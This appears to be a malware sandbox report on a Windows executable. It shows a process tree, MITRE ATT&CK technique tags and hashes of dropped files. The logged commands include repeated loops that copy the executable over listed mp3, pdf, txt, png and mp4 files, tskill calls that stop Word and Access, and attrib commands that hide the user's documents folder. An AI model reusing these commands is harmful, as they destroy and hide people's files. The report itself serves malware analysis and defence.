- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7180
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7252
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7536
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8108
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7584
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8884
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8936
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8980
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9084
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9040
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9184
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8548
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8244
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9112
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8532
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8740
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:6040

C:\Windows\system32\tskill.exe
tskill msaccess
1⤵
PID:2208

C:\Windows\system32\tskill.exe
tskill WINWORD
1⤵
PID:568
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E0D1.tmp\E0FD.tmp\E0FE.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10120

C:\Windows\system32\tskill.exe
tskill WINWORD
1⤵
PID:588
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DA88.tmp\DA88.tmp\DA89.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8316

C:\Windows\system32\tskill.exe
tskill WINWORD
1⤵
PID:3060

C:\Windows\system32\tskill.exe
tskill WINWORD
1⤵
PID:1864
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DBCE.tmp\DBDF.tmp\DBE0.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9264

C:\Windows\system32\tskill.exe
tskill msaccess
1⤵
PID:1740

C:\Windows\system32\tskill.exe
tskill WINWORD
1⤵
PID:936

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\my documents"
1⤵
- Views/modifies file attributes
PID:1692
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B0F7.tmp\B0F8.tmp\B0F9.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:7464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8720

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\my documents"
1⤵
- Views/modifies file attributes
PID:2008

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\my documents"
1⤵
- Views/modifies file attributes
PID:1656
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCF9.tmp\DD07.tmp\DD08.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9564

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\my documents"
1⤵
- Views/modifies file attributes
PID:2708

C:\Windows\system32\tskill.exe
tskill WINWORD
1⤵
PID:2720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:1988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2156
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AC46.tmp\AC47.tmp\AC48.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2840

C:\Windows\system32\tskill.exe
tskill WINWORD
1⤵
PID:2976

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\my documents"
1⤵
- Views/modifies file attributes
PID:972

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\my documents"
1⤵
- Views/modifies file attributes
PID:2168

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\my documents"
1⤵
- Views/modifies file attributes
PID:2572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:1844
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7588
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7560
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7628
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7756
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7840
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7696
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7668
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7948
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8004
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7064
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7516
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7720
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7884
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8228
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9168
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9060
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7228
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8480
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8144
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8076
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8600
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9412
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9840
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7164
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:10024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:1920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2488
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DBAF.tmp\DBB0.tmp\DBB1.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:1720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:1620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:1528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:1960
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E0ED.tmp\E10D.tmp\E10E.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:1176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:1160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2264
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DA29.tmp\DA2A.tmp\DA2B.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:7876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2260
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CABE.tmp\CABF.tmp\CAD0.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:7904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:1044
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DBC1.tmp\DBDF.tmp\DBE0.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:1172
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DE3E.tmp\DE3F.tmp\DE40.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:1824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:1684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:1984
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCC9.tmp\DCD8.tmp\DCE9.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:948
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D8B3.tmp\D8C3.tmp\D8C4.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:936
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E1D7.tmp\E1D8.tmp\E1D9.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:1640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2528
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E4C4.tmp\E4C5.tmp\E4C6.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:1304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2476
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCB9.tmp\DCC9.tmp\DCCA.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
1⤵
PID:2468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y "
1⤵
PID:2612

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "694377488102195050655622824432466311-15789215252097011412-11762896741610561884"
1⤵
- Drops file in Windows directory
PID:1168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\AUTOEXEC.BAT

Filesize
405B

MD5
bc8ee51975de09049ac04673e6509d11

SHA1
b250ffe29fd44bf39ac20f877ca3a809c886344c

SHA256
14206c08a751ef48c358b75bfa72c2841dad31077916c21ff2e7843d5418b4a0

SHA512
a02a90aa312b49d10abfb08c14fda3f55efa65d1722d00a01578d149943d6f962a93a38ece8c5450a04f34e41afcfee8d113c0f90e9ae6fc45e95d6073603ee4

Download Submit
C:\AUTOEXEC.BAT

Filesize
486B

MD5
337a122218e8d6e63fd72a010baddb42

SHA1
0361ef124a3a077ff3724d4c85643d4e7017fbdd

SHA256
657778dd8ca22fcedebc11619ee3da3be8e03c31ab8644aa0a6da7d7cf73408e

SHA512
